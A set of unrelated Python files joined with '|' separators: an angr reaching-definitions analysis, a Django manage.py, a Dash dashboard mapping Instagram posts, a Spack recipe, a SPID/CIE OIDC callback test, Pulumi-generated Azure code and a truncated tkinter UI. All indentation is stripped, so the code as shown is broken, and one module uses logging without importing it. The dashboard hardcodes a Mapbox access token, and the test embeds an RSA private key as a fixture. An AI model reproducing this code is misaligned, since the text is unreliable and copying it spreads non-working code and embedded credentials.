from typing import Optional, DefaultDict, Dict, Tuple, Set, Any, Union, TYPE_CHECKING
from collections import defaultdict
import ailment
import pyvex
from ...block import Block
from ...codenode import CodeNode
from ...engines.light import SimEngineLight
from ...knowledge_plugins.functions import Function
from ...knowledge_plugins.key_definitions import ReachingDefinitionsModel, LiveDefinitions
from ...knowledge_plugins.key_definitions.constants import OP_BEFORE, OP_AFTER
from ...misc.ux import deprecated
from ..analysis import Analysis
from ..forward_analysis import ForwardAnalysis
from .engine_ail import SimEngineRDAIL
from .engine_vex import SimEngineRDVEX
from .rd_state import ReachingDefinitionsState
from .subject import Subject
if TYPE_CHECKING:
from .dep_graph import DepGraph
l = logging.getLogger(name=__name__)
class ReachingDefinitionsAnalysis(ForwardAnalysis, Analysis): # pylint:disable=abstract-method
"""
ReachingDefinitionsAnalysis is a text-book implementation of a static data-flow analysis that works on either a
function or a block. It supports both VEX and AIL. By registering observers to observation points, users may use
this analysis to generate use-def chains, def-use chains, and reaching definitions, and perform other traditional
data-flow analyses such as liveness analysis.
* I've always wanted to find a better name for this analysis. Now I gave up and decided to live with this name for
the foreseeable future (until a better name is proposed by someone else).
* Aliasing is definitely a problem, and I forgot how aliasing is resolved in this implementation. I'll leave this
as a post-graduation TODO.
* Some more documentation and examples would be nice.
"""
def __init__(self, subject=None, func_graph=None, max_iterations=3, track_tmps=False,
observation_points=None, init_state: ReachingDefinitionsState=None, cc=None, function_handler=None,
current_local_call_depth=1, maximum_local_call_depth=5, observe_all=False, visited_blocks=None,
dep_graph: Optional['DepGraph']=None, observe_callback=None):
"""
:param Block|Function subject: The subject of the analysis: a function, or a single basic block.
:param func_graph: Alternative graph for function.graph.
:param int max_iterations: The maximum number of iterations before the analysis is terminated.
:param Boolean track_tmps: Whether or not temporary variables should be taken into consideration
during the analysis.
:param iterable observation_points: A collection of tuples of ("node"|"insn", ins_addr, OP_TYPE) defining
where reaching definitions should be copied and stored. OP_TYPE can be
OP_BEFORE or OP_AFTER.
:param init_state: An optional initialization state. The analysis creates and works on a
copy.
Default to None: the analysis then initialize its own abstract state,
based on the given <Subject>.
:param SimCC cc: Calling convention of the function.
:param list function_handler: Handler for functions, naming scheme: handle_<func_name>|local_function(
<ReachingDefinitions>, <Codeloc>, <IP address>).
:param int current_local_call_depth: Current local function recursion depth.
:param int maximum_local_call_depth: Maximum local function recursion depth.
:param Boolean observe_all: Observe every statement, both before and after.
:param visited_blocks: A set of previously visited blocks.
:param dep_graph: An initial dependency graph to add the result of the analysis to. Set it
to None to skip dependency graph generation.
"""
self._subject = Subject(subject, self.kb.cfgs['CFGFast'], func_graph, cc)
self._graph_visitor = self._subject.visitor
ForwardAnalysis.__init__(self, order_jobs=True, allow_merging=True, allow_widening=False,
graph_visitor=self._graph_visitor)
self._track_tmps = track_tmps
self._max_iterations = max_iterations
self._observation_points = observation_points
self._init_state = init_state
self._function_handler = function_handler
self._current_local_call_depth = current_local_call_depth
self._maximum_local_call_depth = maximum_local_call_depth
self._dep_graph = dep_graph
if self._init_state is not None:
self._init_state = self._init_state.copy()
self._init_state.analysis = self
self._observe_all = observe_all
self._observe_callback = observe_callback
# sanity check
if self._observation_points and any(not type(op) is tuple for op in self._observation_points):
raise ValueError('"observation_points" must be tuples.')
if type(self) is ReachingDefinitionsAnalysis and \
not self._observe_all and \
not self._observation_points and \
not self._observe_callback:
l.warning('No observation point is specified. '
'You cannot get any analysis result from performing the analysis.'
)
self._node_iterations: DefaultDict[int, int] = defaultdict(int)
self._engine_vex = SimEngineRDVEX(self.project, self._current_local_call_depth, self._maximum_local_call_depth,
functions=self.kb.functions,
function_handler=self._function_handler)
self._engine_ail = SimEngineRDAIL(self.project, self._current_local_call_depth, self._maximum_local_call_depth,
function_handler=self._function_handler)
self._visited_blocks: Set[Any] = visited_blocks or set()
self.model: ReachingDefinitionsModel = ReachingDefinitionsModel(
func_addr=self.subject.content.addr if isinstance(self.subject.content, Function) else None)
self._analyze()
@property
def observed_results(self) -> Dict[Tuple[str,int,int],LiveDefinitions]:
return self.model.observed_results
@property
def all_definitions(self):
return self.model.all_definitions
@all_definitions.setter
def all_definitions(self, v):
self.model.all_definitions = v
@property
def all_uses(self):
return self.model.all_uses
@property
def one_result(self):
if not self.observed_results:
raise ValueError('No result is available.')
if len(self.observed_results) != 1:
raise ValueError("More than one results are available.")
return next(iter(self.observed_results.values()))
@property
def dep_graph(self):
return self._dep_graph
@property
def visited_blocks(self):
return self._visited_blocks
@deprecated(replacement="get_reaching_definitions_by_insn")
def get_reaching_definitions(self, ins_addr, op_type):
return self.get_reaching_definitions_by_insn(ins_addr, op_type)
def get_reaching_definitions_by_insn(self, ins_addr, op_type):
key = 'insn', ins_addr, op_type
if key not in self.observed_results:
raise KeyError(("Reaching definitions are not available at observation point %s. "
"Did you specify that observation point?") % key)
return self.observed_results[key]
def get_reaching_definitions_by_node(self, node_addr, op_type):
key = 'node', node_addr, op_type
if key not in self.observed_results:
raise KeyError("Reaching definitions are not available at observation point %s. "
"Did you specify that observation point?" % str(key))
return self.observed_results[key]
def node_observe(self, node_addr: int, state: ReachingDefinitionsState, op_type: int) -> None:
"""
:param node_addr: Address of the node.
:param state: The analysis state.
:param op_type: Type of the bbservation point. Must be one of the following: OP_BEFORE, OP_AFTER.
"""
key = 'node', node_addr, op_type
observe = False
if self._observe_all:
observe = True
elif self._observation_points is not None and key in self._observation_points:
observe = True
elif self._observe_callback is not None:
observe = self._observe_callback('node', addr=node_addr, state=state, op_type=op_type)
if observe:
self.observed_results[key] = state.live_definitions
def insn_observe(self, insn_addr: int, stmt: Union[ailment.Stmt.Statement,pyvex.stmt.IRStmt],
block: Union[Block,ailment.Block], state: ReachingDefinitionsState, op_type: int) -> None:
"""
:param insn_addr: Address of the instruction.
:param stmt: The statement.
:param block: The current block.
:param state: The abstract analysis state.
:param op_type: Type of the observation point. Must be one of the following: OP_BEORE, OP_AFTER.
"""
key = 'insn', insn_addr, op_type
observe = False
if self._observe_all:
observe = True
elif self._observation_points is not None and key in self._observation_points:
observe = True
elif self._observe_callback is not None:
observe = self._observe_callback('insn', addr=insn_addr, stmt=stmt, block=block, state=state,
op_type=op_type)
if not observe:
return
if isinstance(stmt, pyvex.stmt.IRStmt):
# it's an angr block
vex_block = block.vex
# OP_BEFORE: stmt has to be IMark
if op_type == OP_BEFORE and type(stmt) is pyvex.stmt.IMark:
self.observed_results[key] = state.live_definitions.copy()
# OP_AFTER: stmt has to be last stmt of block or next stmt has to be IMark
elif op_type == OP_AFTER:
idx = vex_block.statements.index(stmt)
if idx == len(vex_block.statements) - 1 or type(
vex_block.statements[idx + 1]) is pyvex.IRStmt.IMark:
self.observed_results[key] = state.live_definitions.copy()
elif isinstance(stmt, ailment.Stmt.Statement):
# it's an AIL block
self.observed_results[key] = state.live_definitions.copy()
@property
def subject(self):
return self._subject
#
# Main analysis routines
#
def _pre_analysis(self):
pass
def _initial_abstract_state(self, node) -> ReachingDefinitionsState:
if self._init_state is not None:
return self._init_state
else:
return ReachingDefinitionsState(
self.project.arch, self.subject, track_tmps=self._track_tmps, analysis=self,
)
def _merge_states(self, node, *states):
return states[0].merge(*states[1:])
def _run_on_node(self, node, state: ReachingDefinitionsState):
"""
:param node: The current node.
:param state: The analysis state.
:return: A tuple: (reached fix-point, successor state)
"""
self._visited_blocks.add(node)
engine: SimEngineLight
if isinstance(node, ailment.Block):
block = node
block_key = node.addr
engine = self._engine_ail
elif isinstance(node, (Block, CodeNode)):
block = self.project.factory.block(node.addr, node.size, opt_level=1, cross_insn_opt=False)
block_key = node.addr
engine = self._engine_vex
else:
l.warning("Unsupported node type %s.", node.__class__)
return False, state.copy()
self.node_observe(node.addr, state, OP_BEFORE)
state = state.copy()
state, self._visited_blocks = engine.process(
state,
block=block,
fail_fast=self._fail_fast,
visited_blocks=self._visited_blocks
)
self._node_iterations[block_key] += 1
self.node_observe(node.addr, state, OP_AFTER)
# update all definitions and all uses
self.all_definitions |= state.all_definitions
for use in [state.stack_uses, state.register_uses]:
self.all_uses.merge(use)
if self._node_iterations[block_key] < self._max_iterations:
return True, state
else:
return False, state
def _intra_analysis(self):
pass
def _post_analysis(self):
pass
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_template_dev_22776.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
from datetime import datetime
import os
#querying
import pandas as pd
import numpy as np
#plotting
#from plotly.offline import plot #to save graphs as html files, useful when testing
import plotly.graph_objs as go
#dashboarding
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
mapbox_access_token = 'pk.eyJ1Ijoiam9hb2ZvbnNlY2EiLCJhIjoiY2picXB3cDVvMDczYjJ3bzBxNDV3dGI0MSJ9.XpQDNjTuMAM-xckGln0KrA'
app = dash.Dash()
#app.css.append_css({"external_url": "https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.3/css/bootstrap.min.css"})
kw_filter= open('support/active_keyword', 'r')
header_keyword=kw_filter.readline()
keyword = header_keyword.rstrip()
kw_filter.close()
path = '../../Web_Crawler/_data/'
i = open(path + '%s_instagram_posts.csv' % keyword, 'r')
ig_df = pd.read_csv(i)
def drop_minutes_and_seconds(olddate):
new_date = datetime.fromtimestamp(olddate).replace(minute=0, second=0, microsecond=0)
return new_date
ig_df['date'] = ig_df['taken_at'].apply(drop_minutes_and_seconds)
ig_df.sort_values(['date'], ascending=False)
#yvalues_ig_hist1 = ig_df[['date']].groupby('date').size()
#
#xvalues = []
#for value in ig_df['date']:
# if value not in xvalues:
# xvalues.append(value)
#yvalues = []
#for date in xvalues:
# yvalues.append(yvalues_ig_hist1[date])
#plotting Ig posts
diff = (max(ig_df['date'])-min(ig_df['date']))
number_of_bins= (diff.days+1)*24
#first_ig_histogram = [go.Scatter(x=xvalues, y=yvalues)]
ig_histogram = [go.Histogram(x=ig_df['date'], nbinsx=number_of_bins)]
hist_configuration= go.Layout(title='Instagram posts associated to keyword \'%s\'' % keyword, xaxis=dict(title='Hours'), yaxis=dict(title='Count'))
plot_ig_posts = go.Figure(data=ig_histogram, layout=hist_configuration)
#flnm_posts_ig_histogram= keyword + '_posts_ig_histogram.html'
#plot(plot_ig_posts, filename=flnm_posts_ig_histogram, show_link=False, auto_open=False)
i.close()
# =============================================================================
# plotting geomap
# =============================================================================
lon=[]
for coord in ig_df['lng']:
lon.append(coord)
lat=[]
for coord in ig_df['lat']:
lat.append(coord)
#size=
data = go.Data([
go.Scattermapbox(
lat=ig_df['lat'],
lon=ig_df['lng'],
mode='markers',
# marker=go.Marker(
# size=[endpt_size] + [4 for j in range(len(steps) - 2)] + [endpt_size])
text=ig_df['caption_text']
)
])
layout = go.Layout(
title='Location of Posts',
autosize=True,
hovermode='closest',
mapbox=dict(
accesstoken=mapbox_access_token,
bearing=0,
style='dark',
center=dict(
lat=38.7,
lon=-7.98,
),
pitch=0,
zoom=2.2
),
)
wonder_map = go.Figure(data=data, layout=layout)
#plot(wonder_map, filename='scatterplottest.html', show_link=False, auto_open=True)
# =============================================================================
# last plot
# =============================================================================
comments_data_datecount = ig_df.groupby('date').agg({'comment_count': np.sum}).reset_index()
ig_df['postcount']=ig_df['date']
posts_data_datecount = ig_df.groupby('date').agg({'postcount': np.count_nonzero}).reset_index()
comments_plot= go.Bar(x=comments_data_datecount['date'], y=comments_data_datecount['comment_count'], name='Comments')
posts_plot= go.Bar(x=posts_data_datecount['date'] ,y=posts_data_datecount['postcount'], name='Posts' )
bar_chart_layout= go.Layout(title='Number of comments relative to posts', xaxis=dict(title='Days'), yaxis=dict(title='Count'))
bar_chart_content = [posts_plot,comments_plot]
last_bar_chart = go.Figure(data=bar_chart_content, layout=bar_chart_layout)
#plot(last_bar_chart, filename='barplottest.html', show_link=False, auto_open=True)
# =============================================================================
# Creating dashboard
# =============================================================================
app.layout = html.Div([
# html.H1('Hello Dash'),
# html.Div('''Dash: A web application framework for Python.'''),
dcc.Graph(id='overall-plot',figure=last_bar_chart),
html.Div([
dcc.Graph(id='example-graph',figure=wonder_map)
], style={'width': '49%', 'display': 'inline-block'}),
html.Div([
dcc.Graph(id='whatsthisevenfor',figure=plot_ig_posts)
], style={'width': '49%', 'display': 'inline-block'})
])
if __name__ == '__main__':
app.server.run(host='0.0.0.0', port=8051)
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Librsb(AutotoolsPackage):
"""librsb : A shared memory parallel sparse matrix computations
library for the Recursive Sparse Blocks format"""
homepage = "http://librsb.sourceforge.net/"
url = "http://download.sourceforge.net/librsb/librsb-1.3.0.0.tar.gz"
list_url = "https://sourceforge.net/projects/librsb/files/"
version('1.3.0.0', '2ac8725d1f988f57df9383ae6b0bb2ed221ec935187d31ebb62ea95ee868a790')
version('1.2.0.11', '0686be29bbe277e227c6021de6bd0564e4fc83f996b787886437d28048057bc8')
version('1.2.0.10', 'ec49f3f78a7c43fc9e10976593d100aa49b1863309ed8fa3ccbb7aad52d2f7b8')
version('1.2.0.9', 'f421f5d572461601120933e3c1cfee2ca69e6ecc92cbb11baa4e86bdedd3d9fa')
version('1.2.0.8', '8bebd19a1866d80ade13eabfdd0f07ae7e8a485c0b975b5d15f531ac204d80cb')
depends_on('zlib')
conflicts('%apple-clang')
conflicts('%clang')
def configure_args(self):
args = [
'--enable-openmp',
'--with-zlib',
'--enable-fortran-module-install',
'CPPFLAGS={0}'.format(self.spec['zlib'].headers.include_flags),
'CFLAGS=-O3',
'CXXFLAGS=-O3',
'LDFLAGS={0}'.format(self.spec['zlib'].libs.search_flags)
]
return args
|
from copy import deepcopy
import json
from unittest.mock import patch
from django.contrib.auth import get_user_model
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from spid_cie_oidc.entity.models import FederationEntityConfiguration
from spid_cie_oidc.relying_party.models import OidcAuthentication
from spid_cie_oidc.authority.tests.settings import rp_conf
from spid_cie_oidc.provider.tests.settings import op_conf
from spid_cie_oidc.onboarding.tests.authn_request_settings import AUTHN_REQUEST_SPID
from spid_cie_oidc.relying_party.tests.mocked_response import MockedTokenEndPointResponse, MockedUserInfoResponse
STATE = "fyZiOL9Lf2CeKuNT2JzxiLRDink0uPcd"
CODE = "usDwMnEzJPpG5oaV8x3j&"
class RpCallBack(TestCase):
def setUp(self):
self.rp_jwk = {
'kty': 'RSA',
'kid': '19xSsWuFOo5bFBUECA5G3V5GEhC0s7X8TTCEykdzsmo',
'e': 'AQAB',
'n': 'vfzFzFAv4e1IPfH6XMeB_L3f9sRZuaOtRsAs7s6ujGv6PwVMPsdELqd2NzrmKrLih3ZysJ6RoRe87rGZUZu2GbDtZhupCPb-1MuxB810svua9PwCrQK2wADM8q26colAiAOGSt912LUPC6MOYus44xd7TUDtQcsm-3VXWu4DA19NQXOaUh2TRal6GKXr7D8teod0fo736oHTObWoDZ0KdAGlwxI6IbQKpipgTD6lZ3l9L6WSmdLI9T-TyyNV9fW6rNqhnbySCEGkCM-Up6C2GQqLTq76kQNSMGasXrd3qH07KnTLBZsFy4JV4L-ws3zgaB4PLBOdfYAYe-xSp9-H_Q', 'd': 'MYc9FXduFCrko2l6yEcmhvoE8fLcJT4bRQ-CZzswW-EmWtmJt_AAwVzcv6c2K7l4vrHNUmf0NRfYJC3ed1ztiyMJsI3TckfZxSXY39za6HIZQnaUSAAmHkXXKAjMS2Gmlg69KrW4picFZhY7AOSrbuBHP6uGbpmEbxd3D3hvBqiU6cn_TAwbIhsJniTuSYYbvHd8z93QCKBfp_nDMltz6WG8YUXFiqtzRKv62Y4K2J_zjyd7-JKiWEBh5FUNuqZ2txEV3-q6bwoh3lSGA1qZtVgU61CwHqGQK3uxfEGPV68O48NVJNEe4YgNE806IfREgprTe3osGHd2S96s-t8oYQ',
'p': '9pwMs9MCfes5vYzXb8n1BqAL3LGdPp48jg7iKD4mZ6oLpeCbwNqtB7zN24OqrOnP2nREL2ugkSU2bBrsMy1hZ6k2DnN7cZkNgv4CZ_lO35Bc9CF9j1sCTxUnXQknympL8HVZoG2TdxUL0P09TgiBYz8SVH-uxFnlCuVZBLx35Lk',
'q': 'xTjFHi0QGPYSXGgbUN5cl9LOw7K2ifULDbEPiYSnbzd_oVneA-q6BmanMM5CLrj8qKJPy2Cuz3do-ZZPG_SN5AU_x23K9Vga3honcomo7G0cYKi9wGPBKzAMCRNRFHp3f3BAcp6HUJRn02Q_F_xDmXeC8JiPeATSBIDCXv41I2U'
}
data = deepcopy(AUTHN_REQUEST_SPID)
self.rp_config = deepcopy(rp_conf)
authz_entry = dict(
client_id=self.rp_config["metadata"]["openid_relying_party"]["client_id"],
provider=op_conf["sub"],
provider_id=op_conf["sub"],
data=json.dumps(data),
state=STATE,
provider_configuration=op_conf["metadata"]["openid_provider"],
)
OidcAuthentication.objects.create(**authz_entry)
self.rp_config["sub"] = self.rp_config["metadata"]["openid_relying_party"]["client_id"]
FederationEntityConfiguration.objects.create(**self.rp_config)
rp_conf_saved = FederationEntityConfiguration.objects.all().first()
rp_conf_saved.metadata["openid_relying_party"]["jwks"]["keys"][0]["kid"] = rp_conf_saved.jwks[0]["kid"]
rp_conf_saved.save()
self.op_conf = FederationEntityConfiguration.objects.create(**op_conf)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("requests.get", return_value=MockedUserInfoResponse())
def test_rp_callback(self, mocked, mocked_2):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
user = get_user_model().objects.first()
self.assertTrue(
user.attributes['fiscal_number'] == "sdfsfs908df09s8df90s8fd0"
)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("requests.get", return_value=MockedUserInfoResponse())
def test_rp_callback_no_rp_attr_map(self, mocked, mocked_2, mocked_3):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
self.assertTrue(res.status_code == 403)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("requests.get", return_value=MockedUserInfoResponse())
def test_rp_callback_incorret_request(self, mocked, mocked_2, mocked_3):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {})
self.assertTrue("error" in res.json())
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("spid_cie_oidc.relying_party.views.SpidCieOidcRpCallbackView.get_userinfo", return_value=None)
def test_rp_callback_no_userinfo(self, mocked, mocked_2, mocked_3):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
self.assertTrue(res.status_code == 400)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
@patch("spid_cie_oidc.relying_party.views.SpidCieOidcRpCallbackView.access_token_request", return_value=None)
def test_rp_callback_no_token_response(self, mocked, mocked_2):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
self.assertTrue(res.status_code == 400)
self.assertTrue("invalid token response" in res.content.decode())
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetNetworkVirtualApplianceResult',
'AwaitableGetNetworkVirtualApplianceResult',
'get_network_virtual_appliance',
]
@pulumi.output_type
class GetNetworkVirtualApplianceResult:
"""
NetworkVirtualAppliance Resource.
"""
def __init__(__self__, address_prefix=None, boot_strap_configuration_blobs=None, cloud_init_configuration=None, cloud_init_configuration_blobs=None, etag=None, id=None, identity=None, inbound_security_rules=None, location=None, name=None, nva_sku=None, provisioning_state=None, tags=None, type=None, virtual_appliance_asn=None, virtual_appliance_nics=None, virtual_appliance_sites=None, virtual_hub=None):
if address_prefix and not isinstance(address_prefix, str):
raise TypeError("Expected argument 'address_prefix' to be a str")
pulumi.set(__self__, "address_prefix", address_prefix)
if boot_strap_configuration_blobs and not isinstance(boot_strap_configuration_blobs, list):
raise TypeError("Expected argument 'boot_strap_configuration_blobs' to be a list")
pulumi.set(__self__, "boot_strap_configuration_blobs", boot_strap_configuration_blobs)
if cloud_init_configuration and not isinstance(cloud_init_configuration, str):
raise TypeError("Expected argument 'cloud_init_configuration' to be a str")
pulumi.set(__self__, "cloud_init_configuration", cloud_init_configuration)
if cloud_init_configuration_blobs and not isinstance(cloud_init_configuration_blobs, list):
raise TypeError("Expected argument 'cloud_init_configuration_blobs' to be a list")
pulumi.set(__self__, "cloud_init_configuration_blobs", cloud_init_configuration_blobs)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if inbound_security_rules and not isinstance(inbound_security_rules, list):
raise TypeError("Expected argument 'inbound_security_rules' to be a list")
pulumi.set(__self__, "inbound_security_rules", inbound_security_rules)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if nva_sku and not isinstance(nva_sku, dict):
raise TypeError("Expected argument 'nva_sku' to be a dict")
pulumi.set(__self__, "nva_sku", nva_sku)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if virtual_appliance_asn and not isinstance(virtual_appliance_asn, float):
raise TypeError("Expected argument 'virtual_appliance_asn' to be a float")
pulumi.set(__self__, "virtual_appliance_asn", virtual_appliance_asn)
if virtual_appliance_nics and not isinstance(virtual_appliance_nics, list):
raise TypeError("Expected argument 'virtual_appliance_nics' to be a list")
pulumi.set(__self__, "virtual_appliance_nics", virtual_appliance_nics)
if virtual_appliance_sites and not isinstance(virtual_appliance_sites, list):
raise TypeError("Expected argument 'virtual_appliance_sites' to be a list")
pulumi.set(__self__, "virtual_appliance_sites", virtual_appliance_sites)
if virtual_hub and not isinstance(virtual_hub, dict):
raise TypeError("Expected argument 'virtual_hub' to be a dict")
pulumi.set(__self__, "virtual_hub", virtual_hub)
@property
@pulumi.getter(name="addressPrefix")
def address_prefix(self) -> str:
"""
Address Prefix.
"""
return pulumi.get(self, "address_prefix")
@property
@pulumi.getter(name="bootStrapConfigurationBlobs")
def boot_strap_configuration_blobs(self) -> Optional[Sequence[str]]:
"""
BootStrapConfigurationBlobs storage URLs.
"""
return pulumi.get(self, "boot_strap_configuration_blobs")
@property
@pulumi.getter(name="cloudInitConfiguration")
def cloud_init_configuration(self) -> Optional[str]:
"""
CloudInitConfiguration string in plain text.
"""
return pulumi.get(self, "cloud_init_configuration")
@property
@pulumi.getter(name="cloudInitConfigurationBlobs")
def cloud_init_configuration_blobs(self) -> Optional[Sequence[str]]:
"""
CloudInitConfigurationBlob storage URLs.
"""
return pulumi.get(self, "cloud_init_configuration_blobs")
@property
@pulumi.getter
def etag(self) -> str:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.ManagedServiceIdentityResponse']:
"""
The service principal that has read access to cloud-init and config blob.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter(name="inboundSecurityRules")
def inbound_security_rules(self) -> Sequence['outputs.SubResourceResponse']:
"""
List of references to InboundSecurityRules.
"""
return pulumi.get(self, "inbound_security_rules")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nvaSku")
def nva_sku(self) -> Optional['outputs.VirtualApplianceSkuPropertiesResponse']:
"""
Network Virtual Appliance SKU.
"""
return pulumi.get(self, "nva_sku")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualApplianceAsn")
def virtual_appliance_asn(self) -> Optional[float]:
"""
VirtualAppliance ASN.
"""
return pulumi.get(self, "virtual_appliance_asn")
@property
@pulumi.getter(name="virtualApplianceNics")
def virtual_appliance_nics(self) -> Sequence['outputs.VirtualApplianceNicPropertiesResponse']:
"""
List of Virtual Appliance Network Interfaces.
"""
return pulumi.get(self, "virtual_appliance_nics")
@property
@pulumi.getter(name="virtualApplianceSites")
def virtual_appliance_sites(self) -> Sequence['outputs.SubResourceResponse']:
"""
List of references to VirtualApplianceSite.
"""
return pulumi.get(self, "virtual_appliance_sites")
@property
@pulumi.getter(name="virtualHub")
def virtual_hub(self) -> Optional['outputs.SubResourceResponse']:
"""
The Virtual Hub where Network Virtual Appliance is being deployed.
"""
return pulumi.get(self, "virtual_hub")
class AwaitableGetNetworkVirtualApplianceResult(GetNetworkVirtualApplianceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkVirtualApplianceResult(
address_prefix=self.address_prefix,
boot_strap_configuration_blobs=self.boot_strap_configuration_blobs,
cloud_init_configuration=self.cloud_init_configuration,
cloud_init_configuration_blobs=self.cloud_init_configuration_blobs,
etag=self.etag,
id=self.id,
identity=self.identity,
inbound_security_rules=self.inbound_security_rules,
location=self.location,
name=self.name,
nva_sku=self.nva_sku,
provisioning_state=self.provisioning_state,
tags=self.tags,
type=self.type,
virtual_appliance_asn=self.virtual_appliance_asn,
virtual_appliance_nics=self.virtual_appliance_nics,
virtual_appliance_sites=self.virtual_appliance_sites,
virtual_hub=self.virtual_hub)
def get_network_virtual_appliance(expand: Optional[str] = None,
network_virtual_appliance_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkVirtualApplianceResult:
"""
NetworkVirtualAppliance Resource.
API Version: 2020-11-01.
:param str expand: Expands referenced resources.
:param str network_virtual_appliance_name: The name of Network Virtual Appliance.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['networkVirtualApplianceName'] = network_virtual_appliance_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network:getNetworkVirtualAppliance', __args__, opts=opts, typ=GetNetworkVirtualApplianceResult).value
return AwaitableGetNetworkVirtualApplianceResult(
address_prefix=__ret__.address_prefix,
boot_strap_configuration_blobs=__ret__.boot_strap_configuration_blobs,
cloud_init_configuration=__ret__.cloud_init_configuration,
cloud_init_configuration_blobs=__ret__.cloud_init_configuration_blobs,
etag=__ret__.etag,
id=__ret__.id,
identity=__ret__.identity,
inbound_security_rules=__ret__.inbound_security_rules,
location=__ret__.location,
name=__ret__.name,
nva_sku=__ret__.nva_sku,
provisioning_state=__ret__.provisioning_state,
tags=__ret__.tags,
type=__ret__.type,
virtual_appliance_asn=__ret__.virtual_appliance_asn,
virtual_appliance_nics=__ret__.virtual_appliance_nics,
virtual_appliance_sites=__ret__.virtual_appliance_sites,
virtual_hub=__ret__.virtual_hub)
|
import tkinter as tk
from tkinter import ttk
class NoteListUi:
def __init__(self, frame, add_note, save_note_with_title, remove_note_with_title, select_note):
self.frame = frame
self.note_list = tk.Listbox(self.frame, width=30, height=15)
self.note_list.select_note = select_note
self.note_list.bind('<<ListboxSelect>>', self.on_click_note_list)
self.menu_frame = ttk.Labelframe(self.frame)
self.menu_frame.pack()
self.create_button = tk.Button(self.menu_frame, text="Create", command=add_note)
self.create_button.pack(side="left")
self.update_button = tk.Button(self.menu_frame, text="Update", command=lambda: self.on_click_update_button(save_note_with_title))
self.update_button.pack(side="left")
self.remove_button = tk.Button(self.menu_frame, text="Remove", command=lambda: self.on_click_remove_button(remove_note_with_title))
self.remove_button.pack(side="left")
self.note_list.pack()
def on_click_update_button(self, update_note_with_title):
update_note_with_title(self.note_list.get(tk.ACTIVE))
def on_click_remove_button(self, remove_note_with_title):
remove_note_with_title(self.note_list.get(tk.ACTIVE))
def on_click_note_list(self, event):
if self.note_list.curselection():
